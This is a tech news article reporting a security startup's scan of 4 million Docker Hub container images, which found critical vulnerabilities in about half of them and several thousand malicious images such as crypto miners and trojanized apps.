How to Scale End-to-End Observability in AWS Environments

51% of 4 million Docker images have critical vulnerabilities

TL;DR

Prevasio, a cybersecurity startup, has announced that it has completed the scanning of 4 million container images at Docker Hub. Nearly 51% of the images have critical vulnerabilities, and nearly 6,500 of them can be considered malicious.

A dynamic sandbox system was used by Prevasio to download and build images into the Docker containers
A dynamic sandbox system was used by Prevasio to download and build images into the Docker containers
Key Facts
  1. 1

    According to an analysis by Prevasio, half of all the images available on Docker Hub have critical vulnerabilities due to outdated software. The analysis also revealed that thousands of images are in reality dangerous software, with many of them potentially being attack tools.

  2. 2

    As per Prevasio, the malicious containers representing nearly 0.16% of the total have been downloaded more than 300 million times. These were classified as malicious due to the presence of malware, hacking tools, cryptocurrency miners, and trojanized applications.

  3. 3

    The cybersecurity startup also uncovered images with dynamic payloads. It means that the original image does not look malicious, but it has been scripted to run a miner source code when downloaded, compiled then executed.

  4. 4

    A dynamic sandbox system was used by the same company to download and build images into Docker containers. They then ran the containers to detect vulnerabilities and dangerous behavior.

Details

Prevasio’s report concluded that Linux OS, and Linux containers, in particular, were not immune to security risks. Nearly half of all container images hosted by Docker Hub contained one or more critical vulnerabilities and were potentially exploitable. Only one-fifth of all the images tested by the startup had no disclosed vulnerabilities.

The software supply chain is in greater need of security efforts. More attackers have begun identifying weaknesses and slipping malicious software into employees’ computers, bypassing perimeter security.

Docker adoption has become normal for most enterprise-class complex applications, with several large enterprises implementing Docker containers in some form. Due to containerization available everywhere, the attack surface has increased exponentially. As such, the analysis report of Prevasio should be of great concern to any enterprise customer.

Prevasio warned that if a company’s developer took a shortcut by fetching a pre-built image instead of building one anew, there is a huge risk that the pre-built image may have been trojanized. When such images end up in production, they provide easy access to attackers to containerized applications via a backdoor.

Every month there is some bad guy upping their game and utilizing more containers as part of their attack. We expect it to be more prevalent because it is very easy to use a Docker container to trick a target into building the attack tools inside their own network
avatar
Rony Moshkovich
CEO and Co-founder, Prevasio

Get similar news in your inbox weekly, for free

Share this news:
How to Scale End-to-End Observability in AWS Environments

Latest stories


How ManageEngine Applications Manager Can Help Overcome Challenges In Kubernetes Monitoring

We tested ManageEngine Applications Manager to monitor different Kubernetes clusters. This post shares our review …

AIOps with Site24x7: Maximizing Efficiency at an Affordable Cost

In this post we'll dive deep into integrating AIOps in your business suing Site24x7 to …

A Review of Zoho ManageEngine

Zoho Corp., formerly known as AdventNet Inc., has established itself as a major player in …

Should I learn Java in 2023? A Practical Guide

Java is one of the most widely used programming languages in the world. It has …

The fastest way to ramp up on DevOps

You probably have been thinking of moving to DevOps or learning DevOps as a beginner. …

Why You Need a Blockchain Node Provider

In this article, we briefly cover the concept of blockchain nodes provider and explain why …

Top 5 Virtual desktop Provides in 2022

Here are the top 5 virtual desktop providers who offer a range of benefits such …

Why Your Business Should Connect Directly To Your Cloud

Today, companies make the most use of cloud technology regardless of their size and sector. …

7 Must-Watch DevSecOps Videos

Security is a crucial part of application development and DevSecOps makes it easy and continuous.The …